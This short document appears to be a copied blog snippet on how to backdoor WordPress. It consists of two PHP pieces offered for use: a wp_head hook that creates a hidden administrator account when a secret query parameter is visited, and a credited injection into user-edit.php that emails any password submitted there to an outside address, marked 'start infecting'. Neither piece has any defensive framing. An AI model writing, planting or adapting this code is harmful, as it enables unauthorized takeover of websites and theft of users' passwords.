https://doblercarranco.com/como-hacer-un-backdoor-en-wordpress/

/?backdoor=crea

add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
         if ($_GET['backdoor'] == 'crea') {
            require('wp-includes/registration.php');
            if (!username_exists('backdoor')) {
                   $user_id = wp_create_user('backdoor', 'my-password');
                   $user = new WP_User($user_id);
                   $user->set_role('administrator');
              echo 'Puerta trasera creada';
                 die();
            }
         }
}


##############################################
# By     : xSecurity                         #
# Home   : www.sec4ever.com                  #
# Greets : b0x [ Zaid ]                      #
# Inject : /home/user/wp-admin/user-edit.php #
# Note   : Don't Forget Change Email :)      #
##############################################

/**
 * start infecting
 */
if($_POST['submit'])
	{
	$mail = "root@mail.com";
	$subj = "Information URL : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUSET_URI'];
	$mseg = "PASSWORD :" . $_POST['pass2'];
	$func = @mail($mail, $subj, $mseg);
	}
/**
 * end infecting
 */